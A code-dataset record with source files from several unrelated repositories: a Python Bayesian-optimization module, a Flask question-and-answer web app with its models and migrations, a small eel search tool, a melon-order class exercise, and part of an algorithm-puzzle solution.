x_star, NU = knowledge_gradient(true_sample_count, \n 0.1, \n fused_mean, \n fused_var)\n # Add the maximum knowledge gradient and the index of the test point to the\n # output list\n output[1] = nu_star/cost[jj]\n output[2] = x_star\n # Add the actual input values for the maximum of the fused model\n if len(x_test.shape) > 1:\n for ii in range(x_test.shape[1]):\n output.append(x_test[index_max,ii])\n else:\n output.append(x_test[index_max])\n # Add the input values for the maximum knowledge gradient value\n for i in range(x_test.shape[1]):\n output.append(x_test[x_star,i])\n # Return the results\n return output\n\ndef calculate_EI(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n expected improvement of a fused model constructed out of a reification \n model object.\n\n Returns\n -------\n results : list\n The output from the module contains information on some of the parameters\n used as inputs, as well as the maximum expected improvement value. Included\n in the output are the values for all the inputs that correspond to both \n the maximum expected improvement and the maximum of the fused model\n\n \"\"\"\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n # Initialize the output \n output = [0,0,0,jj,kk,mm]\n # Create the fused model\n model_temp.update_GP(*model_data)\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n # Use the fused model to obtain the mean and variance at all test points\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n fused_var = np.diag(fused_var)\n # Find the index of the test point that has the maximum of the fused model\n index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n # if there are more than on maxima, use the first index\n try:\n index_max = index_max_[0]\n except IndexError:\n index_max = index_max_\n # Add the maximum of the fused model to the output \n output[0] = np.max(fused_mean)\n # Calculate the expected improvement for all test point\n nu_star, x_star, NU = expected_improvement(curr_max, \n 0.01, \n fused_mean, \n fused_var)\n # Add the maximum knowledge gradient and the index of the test point to the\n # output list\n output[1] = nu_star/cost[jj]\n output[2] = x_star\n # Add the actual input values for the maximum of the fused model\n if len(x_test.shape) > 1:\n for ii in range(x_test.shape[1]):\n output.append(x_test[index_max,ii])\n else:\n output.append(x_test[index_max])\n # Add the input values for the maximum knowledge gradient value\n for i in range(x_test.shape[1]):\n output.append(x_test[x_star,i])\n # Return the results\n return output \n\n\n\ndef calculate_TS(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n Thompson Sampling of a fused model constructed out of a reification \n model object.\n\n Returns\n -------\n results : list\n The output from the module contains information on some of the parameters\n used as inputs, as well as the maximum expected improvement value. Included\n in the output are the values for all the inputs that correspond to both \n the maximum expected improvement and the maximum of the fused model\n\n \"\"\"\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n # Initialize the output \n output = [0,0,0,jj,kk,mm]\n # Create the fused model\n model_temp.update_GP(*model_data)\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n # Use the fused model to obtain the mean and variance at all test points\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n fused_var = np.diag(fused_var)\n # Find the index of the test point that has the maximum of the fused model\n index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n # if there are more than on maxima, use the first index\n try:\n index_max = index_max_[0]\n except IndexError:\n index_max = index_max_\n # Add the maximum of the fused model to the output \n output[0] = np.max(fused_mean)\n # Calculate the expected improvement for all test point\n nu_star, x_star, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n # Add the maximum knowledge gradient and the index of the test point to the\n # output list\n output[1] = nu_star/cost[jj]\n output[2] = x_star\n # Add the actual input values for the maximum of the fused model\n if len(x_test.shape) > 1:\n for ii in range(x_test.shape[1]):\n output.append(x_test[index_max,ii])\n else:\n output.append(x_test[index_max])\n # Add the input values for the maximum knowledge gradient value\n for i in range(x_test.shape[1]):\n output.append(x_test[x_star,i])\n # Return the results\n return output \n\ndef fused_calculate(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n maximum of a fused model generated from a reification object.\n\n Returns\n -------\n results : list\n The output from the module contains the maximum of the fused model as \n well as the index of the test point that corresponds with that value.\n\n \"\"\"\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, curr_max, xi, sampleOpt) = data[param[0]]\n # Create the fused model\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n if sampleOpt == \"TS\":\n \"\"\"\n Thompson sampling approach\n This approach uses the uncertainty, but is quite significantly slower\n \"\"\"\n fused_var = np.diag(fused_var)\n nu_star, x_star, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n output = [nu_star, x_star]\n elif sampleOpt == \"EI\":\n \"\"\"\n Expected Improvement approach\n \"\"\"\n fused_var = np.diag(fused_var)\n nu_star, x_star, NU = expected_improvement(curr_max, \n xi, \n fused_mean, \n fused_var)\n output = [nu_star, x_star]\n elif sampleOpt == \"KG\":\n \"\"\"\n Knowledge Gradient approach\n \"\"\"\n nu_star, x_star, NU = knowledge_gradient(x_test.shape[0], \n 0.1, \n fused_mean, \n fused_var)\n output = [nu_star, x_star]\n elif sampleOpt == \"Hedge\":\n output = []\n nu, x, NU = knowledge_gradient(x_test.shape[0], \n 0.1, \n fused_mean, \n fused_var)\n output.append([nu, x])\n fused_var = np.diag(fused_var)\n nu, x, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n output.append([nu, x])\n nu, x, NU = expected_improvement(curr_max, \n xi, \n fused_mean, \n fused_var)\n output.append([nu, x])\n nu = np.max(fused_mean)\n try:\n x = int(np.nonzero(fused_mean == nu)[0])\n except TypeError:\n x = int(np.nonzero(fused_mean == nu)[0][0])\n output.append([nu, x])\n else:\n \"\"\"\n Greedy Sampling Approach\n \"\"\"\n # Find the maximum of the fused model\n nu_star = np.max(fused_mean)\n try:\n x_star = int(np.nonzero(fused_mean == nu_star)[0])\n except TypeError:\n x_star = int(np.nonzero(fused_mean == nu_star)[0][0])\n output = [nu_star, x_star]\n \n # return the maximum value and the index of the test point that corresponds\n # with the maximum value\n return output, x_test.shape[0]\n\ndef calculate_GPHedge(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n values from all acquisition functions for use in the GP Hedge portfolio\n optimization appraoch.\n\n Returns\n -------\n results : list\n The output from the module contains the maximum of all acquisition functions\n and the x values associated with these points.\n\n \"\"\"\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n # Initialize the output \n output = [[0,[],[],jj,kk,mm],\n [0,[],[],jj,kk,mm],\n [0,[],[],jj,kk,mm],\n [0,[],[],jj,kk,mm]]\n # Create the fused model\n model_temp.update_GP(*model_data)\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n # Use the fused model to obtain the mean and variance at all test points\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n \n # Find the index of the test point that has the maximum of the fused model\n index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n # if there are more than on maxima, use the first index\n try:\n index_max = index_max_[0]\n except IndexError:\n index_max = index_max_\n # Add the maximum of the fused model to the output \n output[0][0] = np.max(fused_mean)\n output[1][0] = np.max(fused_mean)\n output[2][0] = np.max(fused_mean)\n output[3][0] = np.max(fused_mean)\n\n nu_star = []\n x_star = []\n \n \n #################\n ################\n # Need to convert this next section to run in parallel to reduce the time\n \n \"\"\"\n Knowledge Gradient approach\n \"\"\"\n nu_star, x_star, NU = knowledge_gradient(x_test.shape[0], \n 0.1, \n fused_mean, \n fused_var)\n output[0][1] = nu_star/cost[jj]\n output[0][2] = x_star\n\n \"\"\"\n Thompson sampling approach\n This approach uses the uncertainty, but is quite significantly slower\n \"\"\"\n fused_var = np.diag(fused_var)\n nu_star, x_star, NU = thompson_sampling(fused_mean, np.sqrt(fused_var))\n output[1][1] = nu_star/cost[jj]\n output[1][2] = x_star\n \n \"\"\"\n Expected Improvement approach\n \"\"\"\n nu_star, x_star, NU = expected_improvement(curr_max, \n 0.01, \n fused_mean, \n fused_var)\n output[2][1] = nu_star/cost[jj]\n output[2][2] = x_star\n \n \"\"\"\n Greedy Sampling Approach\n \"\"\"\n # Find the maximum of the fused model\n nu_star = np.max(fused_mean)\n try:\n x_star = int(np.nonzero(fused_mean == nu_star)[0])\n except TypeError:\n x_star = int(np.nonzero(fused_mean == nu_star)[0][0])\n output[3][1] = nu_star/cost[jj]\n output[3][2] = x_star\n \n \n \n # Add the actual input values for the maximum of the fused model\n if len(x_test.shape) > 1:\n for ii in range(x_test.shape[1]):\n output[0].append(x_test[index_max,ii])\n output[1].append(x_test[index_max,ii])\n output[2].append(x_test[index_max,ii])\n output[3].append(x_test[index_max,ii])\n else:\n output[0].append(x_test[index_max])\n output[1].append(x_test[index_max])\n output[2].append(x_test[index_max])\n output[3].append(x_test[index_max])\n \n for i in range(x_test.shape[1]):\n output[0].append(x_test[output[0][2],i])\n output[1].append(x_test[output[1][2],i])\n output[2].append(x_test[output[2][2],i])\n output[3].append(x_test[output[3][2],i])\n \n return output\n\ndef calculate_Greedy(param):\n \"\"\"\n Parameters\n ----------\n param : tuple\n The input is a tuple that contains the data required for calculating the\n Maximum of a fused model constructed out of a reification \n model object for Greedy optimization\n\n Returns\n -------\n results : list\n The output from the module contains information on some of the parameters\n used as inputs, as well as the maximum expected improvement value. Included\n in the output are the values for all the inputs that correspond to the maximum of the fused model\n\n \"\"\"\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, jj, kk, mm, true_sample_count, cost, curr_max) = data[param[0]]\n # Initialize the output \n output = [0,0,0,jj,kk,mm]\n # Create the fused model\n model_temp.update_GP(*model_data)\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n # Use the fused model to obtain the mean and variance at all test points\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n fused_var = np.diag(fused_var)\n # Find the index of the test point that has the maximum of the fused model\n index_max_ = np.nonzero(fused_mean == np.max(fused_mean))\n # if there are more than on maxima, use the first index\n if index_max_[0].shape[0] > 1:\n index_max = int(index_max_[0][0])\n else:\n index_max = int(index_max_[0])\n # try:\n # index_max = int(index_max_)\n # except TypeError:\n # try:\n # index_max = int(index_max_[0])\n # except TypeError:\n # index_max = int(index_max_[0][0])\n # Add the maximum of the fused model to the output \n output[0] = np.max(fused_mean)\n # Add the maximum knowledge gradient and the index of the test point to the\n # output list\n output[1] = np.max(fused_mean)\n output[2] = index_max\n # Add the actual input values for the maximum of the fused model\n for kk in range(2):\n if len(x_test.shape) > 1:\n for ii in range(x_test.shape[1]):\n output.append(x_test[index_max,ii])\n else:\n output.append(x_test[index_max])\n # Return the results\n # print(output)\n return output \n\n\ndef evaluateFusedModel(param):\n # in order to update the gains for the GP Hedge Portfolio optimization scheme\n # it is necessary to query the next best points predicted by all the acquisition\n # functions.\n with open(\"data/parameterSets/parameterSet{}\".format(param[1]), 'rb') as f:\n data = load(f)\n with open(\"data/reificationObj\", 'rb') as f:\n model_temp = load(f)\n (finish, model_data, x_fused, fused_model_HP, \\\n kernel, x_test, curr_max, xi, acqIndex) = data[param[0]]\n # Create the fused model\n model_temp.create_fused_GP(x_fused, fused_model_HP[1:], \n fused_model_HP[0], 0.1, \n kernel)\n fused_mean, fused_var = model_temp.predict_fused_GP(x_test)\n return [acqIndex, fused_mean]\n" } ]
8
hub-vixiv/task3_2
https://github.com/hub-vixiv/task3_2
706b5f78fda97413cbf2d14d5e4ba1d31c9a897a
6c7ca2b94e8d0805c5af605696110621198c8277
dd5d7bf736c434b8a109e266e1454bab01d76eac
refs/heads/master
2023-06-19T21:02:42.784222
2021-07-17T10:43:31
2021-07-17T10:43:31
386,903,522
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5032467246055603, "alphanum_fraction": 0.5043290257453918, "avg_line_length": 28.838708877563477, "blob_id": "be7917974af4a67429558d27abbd8db0ffdb6d47", "content_id": "513df6375652cf2b8d3cf61283aeaeac08868436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1140, "license_type": "no_license", "max_line_length": 77, "num_lines": 31, "path": "/search.py", "repo_name": "hub-vixiv/task3_2", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport eel\n\n\ndef kimetsu_search(filename, word):\n # 検索対象取得\n df=pd.read_csv(\"./\" + filename)\n source = list(df[\"name\"])\n\n # 検索\n if word in source:\n print(\"yes\")\n eel.show_result(f\"『{word}』はあります\")\n else:\n print(\"no\")\n eel.show_result(f\"『{word}』はありません\")\n # 追加\n # リストに保存するか確認ダイアログ表示\n add_yesno = eel.ask_add_list()()\n if add_yesno == True: #リストに保存する\n source.append(word)\n print(source)\n # ファイルに保存するか確認ダイアログ表示\n save_yesno = eel.ask_save()()\n if save_yesno == True: #ファイルに保存する\n #保存するパスを要求ダイアログ表示\n save_path = eel.ask_save_path()()\n if save_path != None: #パスが空でなければ\n # CSV書き込み\n df=pd.DataFrame(source,columns=[\"name\"])\n df.to_csv(f\"{save_path}/source.csv\",encoding=\"utf_8-sig\")" }, { "alpha_fraction": 0.7472222447395325, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 19.05555534362793, "blob_id": "7908ed84d28c9b3731045434e26fb6dad78788ad", "content_id": "cd12f3339bd9c356afa91248ead158b7db262069", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/view.py", "repo_name": "hub-vixiv/task3_2", "src_encoding": "UTF-8", "text": "import eel\nfrom pandas.core import series\nimport desktop\nimport search\nimport pandas as pd\n\napp_name=\"html\"\nend_point=\"index.html\" #確認なし\nsize=(700,600)\n\n\n# 検索処理呼び出し\n@ eel.expose\ndef kimetsu_search(filename, word):\n search.kimetsu_search(filename, word)\n\ndesktop.start(app_name,end_point,size)\n#desktop.start(size=size,appName=app_name,endPoint=end_point)" } ]
2
Banjiushi/flask-project
https://github.com/Banjiushi/flask-project
2ed49a0f7330d655aa1d9c9cf01967de5a92876c
029cd6b42ad7d8322c764ac3237a47d0709b9074
9ceb274079e18a90f8a6c7c3eb4192ce817b611c
refs/heads/master
2021-07-09T07:55:20.667550
2017-10-09T01:02:11
2017-10-09T01:02:11
105,438,646
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 30.46666717529297, "blob_id": "4d25dff113e1cc53592ced2d816c3b04a9f54d48", "content_id": "04a5a12a8ac7079960c8129a821818011c3d12e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 890, "license_type": "no_license", "max_line_length": 189, "num_lines": 15, "path": "/README.md", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# flask-project\n\n### 使用flask和bootstrap搭建了一个简易问答平台\na) 技术范畴:flask,bootstrap \nb) 实现细节:一个基于flask及bootstrap的简单的仿知乎问答平台;支持登录,注册,发布问题,回答问题,查找答案等。 \nc) 项目特色:flask实现,灵活、易扩展;bootstrap搭建,简单易学。\n\n### 流程\n结构搭建 --> 导航条 --> 模板分离 --> 登录页面 --> 注册页面 --> User模型 --> 注册功能 --> 登录功能 --> 登录注销状态切换 --> 发布问答界面(视图函数) --> 登录限制(装饰器) --> 发布问答功能 --> 首页布局及功能 --> 问答详情 --> 评论(模型及功能) --> 评论列表展示 --> 查找功能 --> 密码存储优化\n\n执行数据库相关操作时报错: \n```\nModuleNotFoundError: No module named 'MySQLdb'\n```\n安装 mysqlclient 后解决\n" }, { "alpha_fraction": 0.677089273929596, "alphanum_fraction": 0.6827743053436279, "avg_line_length": 39, "blob_id": "8b6de610080af85d855e43a20b370f0485070bd0", "content_id": "708c5f62e547807e63eff3fd825473ff14342317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 93, "num_lines": 44, "path": "/models.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 数据库模型文件\nfrom datetime import datetime\nfrom exts import db\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nclass User(db.Model):\n __tablename__ = 'user'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n phone = db.Column(db.String(11), nullable=False)\n username = db.Column(db.String(50), nullable=False)\n password = db.Column(db.String(100), nullable=False)\n\n def __init__(self, *args, **kw):\n self.phone = kw.get('phone')\n self.username = kw.get('username')\n self.password = generate_password_hash(kw.get('password'))\n\n def check_password(self, raw_passwd):\n rs = check_password_hash(self.password, raw_passwd)\n return rs\n \n\nclass Question(db.Model):\n __tablename__ = 'question'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(100), nullable=False)\n content = db.Column(db.Text, nullable=False)\n create_time = db.Column(db.DateTime, default=datetime.now)\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n author = db.relationship('User', backref=db.backref('questions'))\n answer = db.relationship('Answer', backref=db.backref('answer.id'))\n\n\nclass Answer(db.Model):\n __tablename__ = 'answer'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n content = db.Column(db.Text, nullable=False)\n create_time = db.Column(db.DateTime, default=datetime.now)\n question_id = db.Column(db.Integer,db.ForeignKey('question.id'))\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n question = db.relationship('Question', backref=db.backref('answers', order_by=id.desc()))\n author = db.relationship('User', backref=db.backref('users'))" }, { "alpha_fraction": 0.6572890281677246, "alphanum_fraction": 0.6905370950698853, "avg_line_length": 20.77777862548828, "blob_id": "e9fd64b9f18ab9ceb99949b696b1592ba7815f89", "content_id": "f7b6b0f3b0161dc1a046ed67c0d69daead08b059", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/config.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 配置文件\n\nimport os\n\nDEBUG = True\n\nSECRET_KEY = os.urandom(24)\n\nHOSTNAME = '127.0.0.1'\nPORT = '3306'\nDATABASE = 'zing_qa'\nUSERNAME = 'root'\nPASSWORD = 'password'\nDB_URI = 'mysql+mysqldb://{}:{}@{}:{}/{}?charset=utf8'.format(USERNAME,\n PASSWORD, HOSTNAME, PORT, DATABASE)\nSQLALCHEMY_DATABASE_URI = DB_URI\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nSQLALCHEMY_COMMIT_ON_TEARDOWN = True # 自动提交事务" }, { "alpha_fraction": 0.7611940503120422, "alphanum_fraction": 0.7611940503120422, "avg_line_length": 12.600000381469727, "blob_id": "041a2cfbf5778242d05ce0996d59c883acf42fb4", "content_id": "0c9bf6afb4c5410bf70670293fd04e7ee716d052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/exts.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# db 文件\n\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()" }, { "alpha_fraction": 0.6254323124885559, "alphanum_fraction": 0.6270284652709961, "avg_line_length": 27.484848022460938, "blob_id": "52d0cabedf5ab3801d6028057a881c28aca75875", "content_id": "395d57449575c9f516bf5a51166da4cdc3a863c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3953, "license_type": "no_license", "max_line_length": 125, "num_lines": 132, "path": "/zingqa.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 应用文件\nfrom flask import Flask, request, redirect, render_template, url_for, \\\n session, g\nimport config\nfrom models import User, Question, Answer\nfrom exts import db\nfrom decorators import login_required\nfrom sqlalchemy import or_\n\napp = Flask(__name__)\napp.config.from_object(config)\ndb.init_app(app)\n\n\[email protected]('/')\ndef index():\n context = {\n 'questions': Question.query.order_by('-create_time').all()\n }\n return render_template('index.html', **context)\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n phone = request.form.get('phone')\n password = request.form.get('password')\n user = User.query.filter(User.phone == phone).first()\n if not (user and user.check_password(password)):\n return '手机号码或密码错误,请确认后再登录!'\n session['user_id'] = user.id\n # 如果想31天内免登陆\n session.permanent = True\n return redirect(url_for('index'))\n \n\[email protected]('/regist', methods=['GET', 'POST'])\ndef regist():\n if request.method == 'GET':\n return render_template('regist.html')\n else:\n phone = request.form.get('phone')\n username = request.form.get('username')\n password1 = request.form.get('password1')\n password2 = request.form.get('password2')\n\n ## 数据校验\n # 手机号码校验\n user = User.query.filter(User.phone == phone).first()\n if user:\n return '该手机号码已被注册,请更换手机号码!'\n # 密码校验\n if password1 != password2:\n return '两次输入的密码不相同,请核对后重新输入'\n # 校验成功,插入数据\n user = User(phone=phone,username=username,password=password1)\n db.session.add(user)\n db.session.commit()\n # 跳转到登录页面\n return redirect(url_for('login'))\n\n\[email protected]('/logout')\n@login_required\ndef logout():\n session.pop('user_id')\n return redirect(url_for('login'))\n\n\[email protected]('/question', methods=['GET', 'POST'])\n@login_required\ndef question():\n if request.method == 'GET':\n return render_template('question.html')\n else:\n title = request.form.get('title')\n content = request.form.get('content')\n question = Question(title=title,content=content)\n question.author = g.user\n db.session.add(question)\n db.session.commit()\n return redirect(url_for('index'))\n\n\[email protected]('/d/<question_id>')\n@login_required\ndef detail(question_id):\n question = Question.query.filter(Question.id==question_id).first()\n quest = Question.query.get(question_id)\n num = len(quest.answer)\n return render_template('detail.html', question=question, num=num)\n\n\[email protected]('/add_answer', methods=['POST'])\n@login_required\ndef add_answer():\n content = request.form.get('answer')\n question_id = request.form.get('question_id')\n answer = Answer(content=content)\n answer.author = g.user\n question =Question.query.filter(Question.id==question_id).first()\n answer.question = question\n db.session.add(answer)\n db.session.commit()\n return redirect(url_for('detail', question_id=question_id))\n\n\[email protected]('/search')\ndef search():\n q = request.args.get('q')\n questions = Question.query.filter(or_(Question.title.contains(q), Question.content.contains(q))).order_by('-create_time')\n return render_template('index.html', questions=questions)\n\[email protected]_request\ndef my_before_request():\n user_id = session.get('user_id')\n if user_id:\n user = User.query.filter(User.id==user_id).first()\n if user:\n g.user = user\n\n\[email protected]_processor\ndef my_context_procesor():\n if hasattr(g, 'user'):\n return {'user': g.user}\n return {}\n\n\nif __name__ == '__main__':\n app.run(debug=True)" }, { "alpha_fraction": 0.7382199168205261, "alphanum_fraction": 0.7382199168205261, "avg_line_length": 18.149999618530273, "blob_id": "e29daf3a3a09901e990625b660868e950ffe8c06", "content_id": "a87fa891afefae3740cb728cba333b7a89e54644", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 49, "num_lines": 20, "path": "/manage.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "# 命令行文件\n\nfrom flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom zingqa import app\nfrom exts import db\n# 还需要将创建好的模型导入进来\nfrom models import User, Question, Answer\n\nmanager = Manager(app)\n\n# 使用 Migrate 绑定 app 和 db\nmigrate = Migrate(app, db)\n\n# 添加迁移脚本命令到 manager 中\nmanager.add_command('db', MigrateCommand)\n\n\nif __name__ == '__main__':\n manager.run()" }, { "alpha_fraction": 0.6319018602371216, "alphanum_fraction": 0.6702454090118408, "avg_line_length": 22.285715103149414, "blob_id": "253eadc5b2161384482d0d73541a5098d1ccde9a", "content_id": "8104ada5bbab5e5106f32552983981607ba82096", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 83, "num_lines": 28, "path": "/migrations/versions/a6dcc6d3cd24_.py", "repo_name": "Banjiushi/flask-project", "src_encoding": "UTF-8", "text": "\"\"\"empty message\n\nRevision ID: a6dcc6d3cd24\nRevises: f65cfea73aae\nCreate Date: 2017-10-03 15:34:44.084412\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a6dcc6d3cd24'\ndown_revision = 'f65cfea73aae'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('answer', sa.Column('create_time', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('answer', 'create_time')\n # ### end Alembic commands ###\n" } ]
7
emilycheera/oo-melons
https://github.com/emilycheera/oo-melons
3a816d58d3f860ba5c57a898200fab7207b5d816
918d1ba1d1a945e0ad25620747767c0e5d9e4f99
70de6e564fc53d4743db1c45536cf75d4104edef
refs/heads/master
2020-12-14T04:15:52.823748
2020-01-17T23:57:49
2020-01-17T23:57:49
234,636,666
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.585489809513092, "alphanum_fraction": 0.6002772450447083, "avg_line_length": 22.279569625854492, "blob_id": "2f6da954a534cca9545ece90f7ee97dccd4709dd", "content_id": "019b462eb009c5c632f700ba82c0587ab39fc6bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2164, "license_type": "no_license", "max_line_length": 82, "num_lines": 93, "path": "/melons.py", "repo_name": "emilycheera/oo-melons", "src_encoding": "UTF-8", "text": "from random import randint\nfrom datetime import datetime\n\n\"\"\"Classes for melon orders.\"\"\"\nclass AbstractMelonOrder:\n \"\"\"An abstract base class that other Melon Orders inherit from.\"\"\"\n\n shipped = False\n\n def __init__(self, species, qty):\n self.species = species\n self.qty = qty\n \n if qty > 100:\n raise TooManyMelonsError(\"No more than 100 melons!\")\n\n def get_base_price(self):\n \"\"\"Return random base price from 5 to 9.\"\"\"\n\n day = datetime.now()\n\n base_price = randint(5, 9)\n\n if day.weekday() != 5 and day.weekday() != 6 and day.hour in range(8, 11):\n base_price += 4\n\n return base_price\n\n def get_total(self):\n \"\"\"Calculate price, including tax.\"\"\"\n base_price = self.get_base_price()\n print(base_price)\n\n if self.species == 'Christmas melon':\n base_price = base_price * 1.5\n\n total = (1 + self.tax) * self.qty * base_price\n\n return total\n\n def mark_shipped(self):\n \"\"\"Record the fact than an order has been shipped.\"\"\"\n\n self.shipped = True\n\n\n\nclass DomesticMelonOrder(AbstractMelonOrder):\n \"\"\"A melon order within the USA.\"\"\"\n\n order_type = \"domestic\"\n tax = 0.08\n\n \n\nclass InternationalMelonOrder(AbstractMelonOrder):\n \"\"\"An international (non-US) melon order.\"\"\"\n\n order_type = \"international\"\n tax = 0.17\n\n def __init__(self, species, qty, country_code):\n super().__init__(species, qty)\n self.country_code = country_code\n \n\n def get_country_code(self):\n \"\"\"Return the country code.\"\"\"\n\n return self.country_code\n\n def get_total(self):\n total = super().get_total()\n if self.qty < 10:\n total += 3\n \n return total\n\n\nclass GovernmentMelonOrder(AbstractMelonOrder):\n \"\"\"A government melon order that must pass security inspection.\"\"\"\n\n order_type = 'government'\n passed_inspection = False\n tax = 0\n\n def mark_inspection(self, passed):\n\n self.passed_inspection = passed\n\n\nclass TooManyMelonsError(ValueError):\n \"\"\"Raises error if order is for more than 100 melons.\"\"\"" } ]
1
free-lunch/algospot-solving
https://github.com/free-lunch/algospot-solving
ed9af366f6383ebc2715aec44c496fd4765446f0
156cdc1cbb3607552904a55bba1771c9fb0f6ec9
32c99d9077bf5b553baa50554d41f5cf22441e0d
refs/heads/master
2020-12-11T09:05:11.182329
2016-08-30T09:12:10
2016-08-30T09:12:10
59,334,190
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4279015362262726, "alphanum_fraction": 0.4560375213623047, "avg_line_length": 20.325000762939453, "blob_id": "97d15f2a07052c79b91c160f62a7f9f4e61b6dad", "content_id": "c5cf716ab4ecc65e8851d883e664b5eb7f923125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 853, "license_type": "no_license", "max_line_length": 52, "num_lines": 40, "path": "/DARPA/DARPA.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndiffs = None\nN, M = None, None\n\ndef decision(minimum):\n cosum = 0\n cnt = 0\n for i in xrange(M-1):\n cosum += diffs[i]\n if cosum >= minimum:\n cosum = 0\n cnt += 1\n if cnt == N-1:\n return True\n return False\n\ndef solve():\n lo = 0.0\n hi = 240.0\n mid = (lo+hi)/2\n while hi-lo > 0.009:\n if decision(mid):\n lo = mid\n else:\n hi = mid\n mid = (lo+hi)/2\n\n return mid\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n N, M = map(int, 